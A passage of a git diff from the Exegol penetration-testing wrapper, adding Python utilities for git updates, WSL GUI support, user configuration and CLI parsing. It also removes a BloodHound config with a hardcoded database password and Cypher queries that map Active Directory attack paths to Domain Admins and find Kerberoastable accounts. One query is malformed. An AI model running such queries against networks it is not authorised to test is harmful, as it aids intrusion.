branch.name.split('/') + if len(branch_parts) < 2: + logger.warning(f"Branch name is not correct: {branch.name}") + result.append(branch.name) + else: + result.append(branch_parts[1]) + return result + + def safeCheck(self) -> bool: + """Check the status of the local git repository, + if there is pending change it is not safe to apply some operations""" + assert self.isAvailable + if self.__gitRepo is None or self.__gitRemote is None: + return False + # Submodule changes must be ignored to update the submodules sources independently of the wrapper + is_dirty = self.__gitRepo.is_dirty(submodules=False) + if is_dirty: + logger.warning("Local git have unsaved change. Skipping source update.") + return not is_dirty + + def isUpToDate(self, branch: Optional[str] = None) -> bool: + """Check if the local git repository is up-to-date. + This method compare the last commit local and the ancestor.""" + assert self.isAvailable + if branch is None: + branch = self.getCurrentBranch() + if branch is None: + logger.warning("No branch is currently attached to the git repository. The up-to-date status cannot be checked.") + return False + assert self.__gitRepo is not None + assert self.__gitRemote is not None + # Get last local commit + current_commit = self.__gitRepo.heads[branch].commit + # Get last remote commit + fetch_result = self.__gitRemote.fetch() + try: + self.__fetchBranchInfo = fetch_result[f'{self.__gitRemote}/{branch}'] + except IndexError: + logger.warning("The selected branch is local and cannot be updated.") + return True + + logger.debug(f"Fetch flags : {self.__fetchBranchInfo.flags}") + logger.debug(f"Fetch note : {self.__fetchBranchInfo.note}") + logger.debug(f"Fetch old commit : {self.__fetchBranchInfo.old_commit}") + logger.debug(f"Fetch remote path : {self.__fetchBranchInfo.remote_ref_path}") + from git import FetchInfo + # Bit check to detect flags info + if self.__fetchBranchInfo.flags & FetchInfo.HEAD_UPTODATE != 0: + logger.debug("HEAD UP TO DATE flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.FAST_FORWARD != 0: + logger.debug("FAST FORWARD flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.ERROR != 0: + logger.debug("ERROR flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.FORCED_UPDATE != 0: + logger.debug("FORCED_UPDATE flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.REJECTED != 0: + logger.debug("REJECTED flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.NEW_TAG != 0: + logger.debug("NEW TAG flag detected") + + remote_commit = self.__fetchBranchInfo.commit + # Check if remote_commit is an ancestor of the last local commit (check if there is local commit ahead) + return self.__gitRepo.is_ancestor(remote_commit, current_commit) + + def update(self) -> bool: + """Update local git repository within current branch""" + assert self.isAvailable + if not self.safeCheck(): + return False + # Check if the git branch status is not detached + if self.getCurrentBranch() is None: + return False + if self.isUpToDate(): + logger.success(f"Git branch [green]{self.getCurrentBranch()}[/green] is already up-to-date.") + return False + if self.__gitRemote is not None: + logger.info(f"Using branch [green]{self.getCurrentBranch()}[/green] on {self.getName()} repository") + with console.status(f"Updating git [green]{self.getName()}[/green]", spinner_style="blue"): + self.__gitRemote.pull(refspec=self.getCurrentBranch()) + logger.success("Git successfully updated") + return True + return False + + def __initSubmodules(self): + """Init (and update git object not source code) git sub repositories (only depth=1)""" + logger.verbose(f"Git {self.getName()} init submodules") + # These module are init / updated manually + blacklist_heavy_modules = ["exegol-resources"] + # Submodules dont have depth submodule limits + depth_limit = not self.__is_submodule + with console.status(f"Initialization of git submodules", spinner_style="blue") as s: + try: + submodules = self.__gitRepo.iter_submodules() + except ValueError: + logger.error(f"Unable to find any git submodule from '{self.getName()}' repository. Check the path in the file {self.__repo_path / '.git'}") + return + for subm in submodules: + # Submodule update are skipped if blacklisted or if the depth limit is set + if subm.name in blacklist_heavy_modules or \ + (depth_limit and ('/' in subm.name or '\\' in subm.name)): + continue + s.update(status=f"Downloading git submodules [green]{subm.name}[/green]") + from git.exc import GitCommandError + try: + subm.update(recursive=True) + except GitCommandError as e: + error = GitUtils.formatStderr(e.stderr) + logger.debug(f"Unable tu update git submodule {subm.name}: {e}") + if "unable to access" in error: + logger.error("You don't have internet to update git submodule. Skipping operation.") + else: + logger.error("Unable to update git submodule. Skipping operation.") + logger.error(error) + except ValueError: + logger.error(f"Unable to update git submodule '{subm.name}'. Check the path in the file '{Path(subm.path) / '.git'}'") + + def submoduleSourceUpdate(self, name: str) -> bool: + """Update source code from the 'name' git submodule""" + if not self.isAvailable: + return False + assert self.__gitRepo is not None + try: + submodule = self.__gitRepo.submodule(name) + except ValueError: + logger.debug(f"Git submodule '{name}' not found.") + return False + from git.exc import RepositoryDirtyError + try: + from git.exc import GitCommandError + try: + # TODO add TUI progress + with console.status(f"Downloading submodule [green]{name}[/green]", spinner_style="blue"): + submodule.update(to_latest_revision=True) + except GitCommandError as e: + logger.debug(f"Unable tu update git submodule {name}: {e}") + if "unable to access" in e.stderr: + logger.error("You don't have internet to update git submodule. Skipping operation.") + else: + logger.error("Unable to update git submodule. Skipping operation.") + logger.error(e.stderr) + return False + logger.success(f"Submodule [green]{name}[/green] successfully updated.") + return True + except RepositoryDirtyError: + logger.warning(f"Submodule {name} cannot be updated automatically as long as there are local modifications.") + logger.error("Aborting git submodule update.") + logger.empty_line() + return False + + def checkout(self, branch: str) -> bool: + """Change local git branch""" + assert self.isAvailable + if not self.safeCheck(): + return False + if branch == self.getCurrentBranch(): + logger.warning(f"Branch '{branch}' is already the current branch") + return False + assert self.__gitRepo is not None + from git.exc import GitCommandError + try: + # If git local branch didn't exist, change HEAD to the origin branch and create a new local branch + if branch not in self.__gitRepo.heads: + self.__gitRepo.references['origin/' + branch].checkout() + self.__gitRepo.create_head(branch) + self.__gitRepo.heads[branch].checkout() + except GitCommandError as e: + logger.error("Unable to checkout to the selected branch. Skipping operation.") + logger.debug(e) + return False + except IndexError as e: + logger.error("Unable to find the selected branch. Skipping operation.") + logger.debug(e) + return False + logger.success(f"Git successfully checkout to '{branch}'") + return True + + def getTextStatus(self) -> str: + """Get text status from git object for rich print.""" + if self.isAvailable: + from git.exc import GitCommandError + try: + if self.isUpToDate(): + result = "[green]Up to date[/green]" + else: + result = "[orange3]Update available[/orange3]" + except GitCommandError: + # Offline error catch + result = "[green]Installed[/green] [bright_black](offline)[/bright_black]" + else: + if self.__git_disable: + result = "[red]Missing dependencies[/red]" + elif self.__git_name == ["wrapper", "images"] and \ + (ConstantConfig.pip_installed or not ConstantConfig.git_source_installation): + result = "[bright_black]Auto-update not supported[/bright_black]" + else: + result = "[bright_black]Not installed[/bright_black]" + return result + + def getName(self) -> str: + """Git name getter""" + return self.__git_name + + def getSubject(self) -> str: + """Git subject getter""" + return self.__git_subject + + def isSubModule(self) -> bool: + """Git submodule status getter""" + return self.__is_submodule + + @classmethod + def formatStderr(cls, stderr): + return stderr.replace('\n', '').replace('stderr:', '').strip().strip("'") + + def __repr__(self) -> str: + """Developer debug object representation""" + return f"GitUtils '{self.__git_name}': {'Active' if self.isAvailable else 'Disable'}" diff --git a/exegol/utils/GuiUtils.py b/exegol/utils/GuiUtils.py new file mode 100644 index 00000000..e8b818fb --- /dev/null +++ b/exegol/utils/GuiUtils.py @@ -0,0 +1,228 @@ +import io +import os +import shutil +import subprocess +import time +from typing import Optional + +from exegol.console.ExegolPrompt import Confirm +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, console + + +class GuiUtils: + """This utility class allows determining if the current system supports the GUI + from the information of the system.""" + + __distro_name = "" + + @classmethod + def isGuiAvailable(cls) -> bool: + """ + Check if the host OS can support GUI application with X11 sharing + :return: bool + """ + # GUI was not supported on Windows before WSLg + if EnvInfo.isWindowsHost(): + logger.debug("Testing WSLg availability") + # WSL + WSLg must be available on the Windows host for the GUI to work + if not cls.__wsl_available(): + logger.error("WSL is [orange3]not available[/orange3] on your system. GUI is not supported.") + return False + # Only WSL2 support WSLg + if EnvInfo.getDockerEngine() != "wsl2": + logger.error("Docker must be run with [orange3]WSL2[/orange3] engine in order to support GUI applications.") + return False + logger.debug("WSL is [green]available[/green] and docker is using WSL2") + if cls.__wslg_installed(): + # X11 GUI socket can only be shared from a WSL (to find WSLg mount point) + if EnvInfo.current_platform != "WSL": + cls.__distro_name = cls.__find_wsl_distro() + # If no WSL is found, propose to continue without GUI + if not cls.__distro_name and not Confirm( + "Do you want to continue [orange3]without[/orange3] GUI support ?", default=True): + raise KeyboardInterrupt + return True + elif cls.__wslg_eligible(): + logger.info("[green]WSLg[/green] is available on your system but [orange3]not installed[/orange3].") + logger.info("Make sure, [green]WSLg[/green] is installed on your Windows by running 'wsl --update' as [orange3]admin[/orange3].") + return True + logger.debug("WSLg is [orange3]not available[/orange3]") + logger.warning( + "Display sharing is [orange3]not supported[/orange3] on your version of Windows. You need to upgrade to [turquoise2]Windows 11[/turquoise2].") + return False + # TODO check mac compatibility (default: same as linux) + return True + + @classmethod + def getX11SocketPath(cls) -> str: + """ + Get the host path of the X11 socket + :return: + """ + if cls.__distro_name: + return f"\\\\wsl.localhost\\{cls.__distro_name}\\mnt\\wslg\\.X11-unix" + return "/tmp/.X11-unix" + + @classmethod + def getDisplayEnv(cls) -> str: + """ + Get the current DISPLAY env to access X11 socket + :return: + """ + return os.getenv('DISPLAY', ":0") + + @staticmethod + def __wsl_test(path, name: Optional[str] = "docker-desktop") -> bool: + """ + Check presence of a file in the WSL docker-desktop image. + the targeted WSL image can be changed with 'name' parameter. + If name is None, the default WSL image will be use. + """ + if EnvInfo.isWindowsHost(): + wsl = shutil.which("wsl.exe") + if not wsl: + return False + if name is None: + ret = subprocess.run(["wsl.exe", "test", "-f", path]) + else: + ret = subprocess.run(["wsl.exe", "-d", name, "test", "-f", path]) + return ret.returncode == 0 + return False + + @classmethod + def __check_wsl_docker_integration(cls, distrib_name) -> bool: + """ + Check the presence of the docker binary in the supplied WSL distribution. + This test allows checking if docker integration is enabled. + """ + return cls.__wsl_test("/usr/bin/docker", distrib_name) + + @classmethod + def __wsl_available(cls) -> bool: + """ + heuristic to detect if Windows Subsystem for Linux is available. + + Uses presence of /etc/os-release in the WSL image to say Linux is there. + This is a de facto file standard across Linux distros. + """ + return cls.__wsl_test("/etc/os-release", name=None) + + @classmethod + def __wslg_installed(cls) -> bool: + """ + Check if WSLg is installed and deploy inside a WSL image by testing if the file wslg/versions.txt exist. + :return: bool + """ + return cls.__wsl_test("/mnt/host/wslg/versions.txt") or cls.__wsl_test("/mnt/wslg/versions.txt", name=None) + + @staticmethod + def __wslg_eligible() -> bool: + """ + Check if the current Windows version support WSLg + :return: + """ + try: + os_version_raw, _, build_number_raw = EnvInfo.getWindowsRelease().split('.')[:3] + except ValueError: + logger.debug(f"Impossible to find the version of windows: '{EnvInfo.getWindowsRelease()}'") + logger.error("Exegol can't know if your [orange3]version of Windows[/orange3] can support dockerized GUIs.") + return False + # Available from Windows 10 Build 21364 + # Available from Windows 11 Build 22000 + os_version = int(os_version_raw) + build_number = int(build_number_raw) + if os_version == 10 and build_number >= 21364: + return True + elif os_version > 10: + return True + return False + + @classmethod + def __find_wsl_distro(cls) -> str: + distro_name = "" + # these distros cannot be used to load WSLg socket + blacklisted_distro = ["docker-desktop", "docker-desktop-data"] + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "-l"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + # Wait for WSL process to end + ret.wait() + if ret.returncode == 0: + skip_header = True + # parse distribs + logger.debug("Found WSL distribution:") + assert ret.stdout is not None + for line in io.TextIOWrapper(ret.stdout, encoding="utf-16le"): + # Skip WSL text header + if skip_header: + skip_header = False + continue + # Remove newline + line = line.strip() + # Skip if line is empty + if not line: + continue + # Remove default text message + name = line.split()[0] + logger.debug(f"- {name}") + # Skip blacklisted WSL + if name not in blacklisted_distro: + eligible = True + # Test if the current WSL has docker integration activated + while not cls.__check_wsl_docker_integration(name): + eligible = False + logger.warning( + f"The '{name}' WSL distribution could be used to [green]enable the GUI[/green] on exegol but the docker integration is [orange3]not enabled[/orange3].") + if not Confirm( + f"Do you want to [red]manually[/red] enable docker integration for WSL '{name}'?", + default=True): + break + eligible = True + if eligible: + distro_name = name + break + if distro_name: + logger.verbose(f"Wsl '{distro_name}' distribution found, the WSLg service can be mounted in exegol.") + else: + logger.warning( + "No WSL distribution was found on your machine. At least one distribution must be available to allow Exegol to use WSLg.") + if Confirm("Do you want Exegol to install one automatically (Ubuntu)?", default=True): + if cls.__create_default_wsl(): + distro_name = "Ubuntu" + else: + assert ret.stderr is not None + logger.error( + f"Error while loading existing wsl distributions. {ret.stderr.read().decode('utf-16le')} (code: {ret.returncode})") + return distro_name + + @classmethod + def __create_default_wsl(cls) -> bool: + logger.info("Creating Ubuntu WSL distribution. Please wait.") + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "--install", "-d", "Ubuntu"], stderr=subprocess.PIPE) + ret.wait() + logger.info("Please follow installation instructions on the new window.") + if ret.returncode != 0: + assert ret.stderr is not None + logger.error( + f"Error while install WSL Ubuntu: {ret.stderr.read().decode('utf-16le')} (code: {ret.returncode})") + return False + else: + while not Confirm("Is the installation of Ubuntu [green]finished[/green]?", default=True): + pass + logger.verbose("Set WSL Ubuntu as default to enable docker integration") + # Set new WSL distribution as default to start it and enable docker integration + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "-s", "Ubuntu"], stderr=subprocess.PIPE) + ret.wait() + # Wait for the docker integration (10 try, 1 sec apart) + with console.status("Waiting for the activation of the docker integration", spinner_style="blue"): + for _ in range(10): + if cls.__check_wsl_docker_integration("Ubuntu"): + break + time.sleep(1) + while not cls.__check_wsl_docker_integration("Ubuntu"): + logger.error("The newly created WSL could not get the docker integration automatically. " + "It has to be activated [red]manually[/red]") + if not Confirm("Has the WSL Ubuntu docker integration been [red]manually[/red] activated?", + default=True): + return False + logger.success("WSL 'Ubuntu' successfully created with docker integration") + return True diff --git a/exegol/utils/MetaSingleton.py b/exegol/utils/MetaSingleton.py new file mode 100644 index 00000000..c5b10eed --- /dev/null +++ b/exegol/utils/MetaSingleton.py @@ -0,0 +1,15 @@ +# Generic singleton class +from typing import Dict + + +class MetaSingleton(type): + """Metaclass to create a singleton class""" + __instances: Dict[type, object] = {} + + def __call__(cls, *args, **kwargs) -> object: + """Redirects each call to the current class to the corresponding single instance""" + if cls not in MetaSingleton.__instances: + # If the instance does not already exist, it is created + MetaSingleton.__instances[cls] = super(MetaSingleton, cls).__call__(*args, **kwargs) + # Return the desired object + return MetaSingleton.__instances[cls] diff --git a/exegol/utils/UserConfig.py b/exegol/utils/UserConfig.py new file mode 100644 index 00000000..67bea840 --- /dev/null +++ b/exegol/utils/UserConfig.py @@ -0,0 +1,110 @@ +import os +from pathlib import Path +from typing import Dict, List, Union + +import yaml +import yaml.parser + +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import logger +from exegol.utils.MetaSingleton import MetaSingleton + + +class UserConfig(metaclass=MetaSingleton): + """This class allows loading user defined configurations""" + + def __init__(self): + # Config file options + self.__exegol_path: Path = Path().home() / ".exegol" + self.__config_file_path: Path = self.__exegol_path / "config.yml" + self.__config_upgrade: bool = False + + # Defaults User config + self.private_volume_path: Path = self.__exegol_path / "workspaces" + self.shared_resources_path: str = str(self.__exegol_path / "my-resources") + self.exegol_resources_path: Path = self.__default_resource_location('exegol-resources') + + # process + self.__load_file() + + def __load_file(self): + if not self.__exegol_path.is_dir(): + logger.verbose(f"Creating exegol home folder: {self.__exegol_path}") + os.mkdir(self.__exegol_path) + if not self.__config_file_path.is_file(): + logger.verbose(f"Creating default exegol config: {self.__config_file_path}") + self.__create_config_file() + else: + self.__parse_config() + if self.__config_upgrade: + logger.verbose("Upgrading config file") + self.__create_config_file() + + def __create_config_file(self): + config = f"""# Exegol configuration + +# Volume path can be changed at any time but existing containers will not be affected by the update +volumes: + # The shared resources volume is a storage space dedicated to the user to customize his environment and tools. This volume can be shared across all exegol containers. + my_resources_path: {self.shared_resources_path} + + # Exegol resources are data and static tools downloaded in addition to docker images. These tools are complementary and are accessible directly from the host. + exegol_resources_path: {self.exegol_resources_path} + + # When containers do not have an explicitly declared workspace, a dedicated folder will be created at this location to share the workspace with the host but also to save the data after deleting the container + private_workspace_path: {self.private_volume_path} +""" + # TODO handle default image selection + # TODO handle default start container + # TODO add custom build profiles path + # TODO add auto_remove flag True/False to remove outdated images + with open(self.__config_file_path, 'w') as file: + file.write(config) + + def __default_resource_location(self, folder_name: str) -> Path: + local_src = ConstantConfig.src_root_path_obj / folder_name + if local_src.is_dir(): + # If exegol is clone from github, exegol-resources submodule is accessible from root src + return local_src + else: + # Default path for pip installation + return self.__exegol_path / folder_name + + def __load_config_path(self, data: dict, config_name: str, default: Union[Path, str]) -> Union[Path, str]: + try: + result = data.get(config_name) + if result is None: + logger.debug(f"Config {config_name} has not been found in exegol config file. Config file will be upgrade.") + self.__config_upgrade = True + return default + return Path(result).expanduser() + except TypeError: + logger.error(f"Error while loading {config_name}! Using default config.") + return default + + def __parse_config(self): + with open(self.__config_file_path, 'r') as file: + try: + data: Dict = yaml.safe_load(file) + except yaml.parser.ParserError: + data = {} + logger.error("Error while parsing exegol config file ! Check for syntax error.") + # bug: logger verbosity not set at this time + logger.debug(data) + volumes_data = data.get("volumes", {}) + # Catch existing but empty section + if volumes_data is None: + volumes_data = {} + self.shared_resources_path = str(self.__load_config_path(volumes_data, 'my_resources_path', self.shared_resources_path)) + self.private_volume_path = self.__load_config_path(volumes_data, 'private_workspace_path', self.private_volume_path) + self.exegol_resources_path = self.__load_config_path(volumes_data, 'exegol_resources_path', self.exegol_resources_path) + + def get_configs(self) -> List[str]: + """User configs getter each options""" + configs = [ + f"Private workspace: [magenta]{self.private_volume_path}[/magenta]", + f"Exegol resources: [magenta]{self.exegol_resources_path}[/magenta]", + f"My resources: [magenta]{self.shared_resources_path}[/magenta]" + ] + # TUI can't be called from here to avoid circular importation + return configs diff --git a/exegol/utils/__init__.py b/exegol/utils/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/utils/argParse.py b/exegol/utils/argParse.py new file mode 100644 index 00000000..6b4ed53a --- /dev/null +++ b/exegol/utils/argParse.py @@ -0,0 +1,99 @@ +import argparse +from logging import CRITICAL +from typing import IO, Optional, List, Union, Dict, cast + +from exegol.console.cli.actions.Command import Command, Option +from exegol.utils.ExeLog import logger + + +class ExegolArgParse(argparse.ArgumentParser): + """Overloading of the main parsing (argparse.ArgumentParser) class""" + + # Using Exelog to print built-in parser message + def _print_message(self, message: str, file: Optional[IO[str]] = None) -> None: + if message: + logger.raw(message, level=CRITICAL, rich_parsing=True) + + +class Parser: + """Custom Exegol CLI Parser. Main controller of argument building and parsing.""" + + __description = "This Python script is a wrapper for Exegol. It can be used to easily manage Exegol on " \ + "your machine." + __formatter_class: type = argparse.RawTextHelpFormatter + + def __init__(self, actions: List[Command]): + """Custom parser creation""" + # Defines every actions available + self.__actions: List[Command] = actions + # Create & init root parser + self.__root_parser: ExegolArgParse + self.__init_parser() + # Configure root options + # (WARNING: these parameters are duplicate with every sub-parse, cannot use positional args here) + self.__set_options(self.__root_parser, Command()) # Add global arguments from Command to the root parser + # Create & fill sub-parser + self.subParser = self.__root_parser.add_subparsers(help="Description of the actions") + self.__set_action_parser() + + def __init_parser(self) -> None: + """Root parser creation""" + + self.__root_parser = ExegolArgParse( + description=self.__description, + epilog=Command().formatEpilog(), + formatter_class=self.__formatter_class, + ) + + def __set_action_parser(self) -> None: + """Create sub-parser for each action and configure it""" + self.__root_parser._positionals.title = "[green]Required arguments[/green]" + for action in self.__actions: + # Each action has a dedicated sub-parser with different options + # the 'help' description of the current action is retrieved + # from the comment of the corresponding action class + sub_parser = self.subParser.add_parser(action.name, help=action.__doc__, + description=action.__doc__, + epilog=action.formatEpilog(), + formatter_class=self.__formatter_class) + sub_parser.set_defaults(action=action) + self.__set_options(sub_parser, target=action) + + def __set_options(self, sub_parser: argparse.ArgumentParser, target: Optional[Command] = None) -> None: + """Add different groups and parameters/options in the current sub_parser""" + global_set = False # Only one group can be global at the time + # Load actions to be processed (default: every action from cls) + actions_list = [target] if target else self.__actions + for action in actions_list: + # On each action, fetch every group to be processed + for argument_group in action.groupArgs: + group_parser: argparse._ActionsContainer + if argument_group.is_global and not global_set: + # If the current group is global (ex: 'Optional arguments'), + # overwriting parser main group before adding custom parameters + global_set = True # The setup application should be run only once + sub_parser._optionals.title = argument_group.title # Overwriting default argparse title + group_parser = sub_parser # Subparser is directly used to add arguments + else: + # In every other case, a dedicated group is created in the parser + group_parser = sub_parser.add_argument_group(argument_group.title, + description=argument_group.description) + # once the group is created in the parser, the arguments can be added to it + option: Dict[str, Union[Option, bool]] + for option in argument_group.options: + try: + # Retrieve Option object from the Dict + assert type(option["arg"]) is Option + argument = cast(Option, option["arg"]) + # Add argument with its config to the parser + group_parser.add_argument(*argument.args, **argument.kwargs) + except argparse.ArgumentError: + continue + + def run_parser(self) -> argparse.Namespace: + """Execute argparse to retrieve user options from argv""" + return self.__root_parser.parse_args() + + def print_help(self): + """Force argparse to display the help message""" + self.__root_parser.print_help() diff --git a/requirements.txt b/requirements.txt index c3e4cd32..1a7e183b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,9 +1,5 @@ -docker~=4.4.1 -requests~=2.23.0 -pandas~=1.0.5 -numpy==1.19.3 #temporary fix for issue #33: forced numpy version while this fix is not over: https://tinyurl.com/y3dm3h86 -tabulate~=0.8.2 -python-dateutil~=2.8.1 -rich~=9.8.2 -pyasn1~=0.4.8 -psutil~=5.7.2 \ No newline at end of file +docker~=5.0.3 +requests>=2.26.0 +rich~=11.2.0 +GitPython~=3.1.26 +PyYAML>=6.0 \ No newline at end of file diff --git a/setup.py b/setup.py new file mode 100644 index 00000000..3e54b0dd --- /dev/null +++ b/setup.py @@ -0,0 +1,75 @@ +import pathlib + +from setuptools import setup, find_packages + +from exegol import __version__ + +here = pathlib.Path(__file__).parent.resolve() + +# Get the long description from the README file +long_description = (here / 'README.md').read_text(encoding='utf-8') + +# Additional non-code data used by Exegol to build local docker image from source +source_directory = "exegol-docker-build" +data_files_dict = {source_directory: [f"{source_directory}/Dockerfile"] + [str(profile) for profile in pathlib.Path(source_directory).rglob('*.dockerfile')]} +data_files = [] +# Add sources files recursively +for path in pathlib.Path(f'{source_directory}/sources').rglob('*'): + # Exclude directory path and exclude dockerhub hooks files + if path.is_dir() or path.parent.name == "hooks": + continue + key = str(path.parent) + if data_files_dict.get(key) is None: + data_files_dict[key] = [] + data_files_dict[key].append(str(path)) +# Dict to tuple +for k, v in data_files_dict.items(): + data_files.append((k, v)) + +setup( + name='Exegol', + version=__version__, + license='GNU (GPLv3)', + author="Shutdown & Dramelac", + author_email='nwodtuhs@pm.me', + description='Python wrapper to use Exegol, a container based fully featured and community-driven hacking environment.', + long_description=long_description, + long_description_content_type='text/markdown', + python_requires='>=3.6, <4', + url='https://github.com/ShutdownRepo/Exegol', + keywords='pentest redteam ctf exegol', + classifiers=[ + 'Development Status :: 5 - Production/Stable', + "Programming Language :: Python :: 3.6", + "Programming Language :: Python :: 3.7", + "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", + "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", + "Operating System :: OS Independent", + ], + install_requires=[ + 'docker~=5.0.3', + 'requests', + 'rich~=11.2.0', + 'PyYAML', + 'GitPython' + ], + packages=find_packages(exclude=["tests"]), + include_package_data=True, + data_files=data_files, + + entry_points={ + 'console_scripts': [ + 'exegol = exegol.manager.ExegolController:main', + ], + }, + + project_urls={ + 'Bug Reports': 'https://github.com/ShutdownRepo/Exegol/issues', + 'Source': 'https://github.com/ShutdownRepo/Exegol', + 'Documentation': 'https://github.com/ShutdownRepo/Exegol/blob/master/README.md', # TODO Create proper documentation + 'Funding': 'https://patreon.com/nwodtuhs', + }, + test_suite='tests' +) diff --git a/sources/bloodhound/config.json b/sources/bloodhound/config.json deleted file mode 100644 index 94fb7803..00000000 --- a/sources/bloodhound/config.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "performance": { - "edge": 5, - "lowGraphics": false, - "nodeLabels": 1, - "edgeLabels": 1, - "darkMode": true, - "debug": true - }, - "edgeincluded": { - "MemberOf": true, - "HasSession": true, - "AdminTo": true, - "AllExtendedRights": true, - "AddMember": true, - "ForceChangePassword": true, - "GenericAll": true, - "GenericWrite": true, - "Owns": true, - "WriteDacl": true, - "WriteOwner": true, - "CanRDP": true, - "ExecuteDCOM": true, - "AllowedToDelegate": true, - "ReadLAPSPassword": true, - "Contains": true, - "GpLink": true, - "AddAllowedToAct": true, - "AllowedToAct": true, - "SQLAdmin": true, - "ReadGMSAPassword": true, - "HasSIDHistory": true, - "CanPSRemote": true - }, - "databaseInfo": { - "url": "bolt://localhost:7687", - "user": "neo4j", - "password": "exegol4thewin" - } -} diff --git a/sources/bloodhound/customqueries.json b/sources/bloodhound/customqueries.json deleted file mode 100644 index 451bf54b..00000000 --- a/sources/bloodhound/customqueries.json +++ /dev/null @@ -1,703 +0,0 @@ -{ - "queries": [ - { - "name": "Owned objects", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH (m) WHERE m.owned=TRUE RETURN m" - }] - }, - { - "name": "Direct groups of owned users", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {owned:true}), (g:Group), p=(u)-[:MemberOf]->(g) RETURN p", - "props": {}, - "allowCollapse": true - }] - }, - { - "name": "Unrolled groups of owned users", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p" - }] - }, - { - "name": "Shortest paths from owned objects to High Value Targets (5 hops)", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Most exploitable paths from owned objects to High Value Targets (5 hops)", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((n {owned:true})-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Next steps (5 hops) from owned objects", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((c {owned: true})-[*1..5]->(s)) WHERE NOT c = s RETURN p" - }] - }, - { - "name": "Next steps (3 hops) from owned objects", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((c {owned: true})-[*1..3]->(s)) WHERE NOT c = s RETURN p" - }] - }, - { - "name": "Owned users with permissions against GPOs", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=(u:User {owned:true})-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p" - }] - }, - { - "name": "Kerberoastable users with a path to DA", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p" - }] - }, - { - "name": "Kerberoastable users with a path to High Value", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {hasspn:true}),(n {highvalue:true}),p = shortestPath( (u)-[*1..]->(n) ) RETURN p" - }] - }, - { - "name": " Kerberoastable users and where they are AdminTo", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "OPTIONAL MATCH (u1:User) WHERE u1.hasspn=true OPTIONAL MATCH (u1)-[r:AdminTo]->(c:Computer) RETURN u" - }] - }, - { - "name": "Kerberoastable users who are members of high value groups", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE g.highvalue=true AND u.hasspn=true RETURN u" - }] - }, - { - "name": "Kerberoastable users with passwords last set > 5 years ago", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE n.hasspn=true AND WHERE u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Kerberoastable Users", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (n:User)WHERE n.hasspn=true RETURN n", - "allowCollapse": false - }] - }, - { - "name": "AS-REProastable Users", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {dontreqpreauth: true}) RETURN u" - }] - }, - { - "name": "Unconstrained Delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c {unconstraineddelegation:true}) return c" - }] - }, - { - "name": "Constrained Delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p" - }] - }, - { - "name": "Unconstrained Delegation systems (without domain controllers)", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers 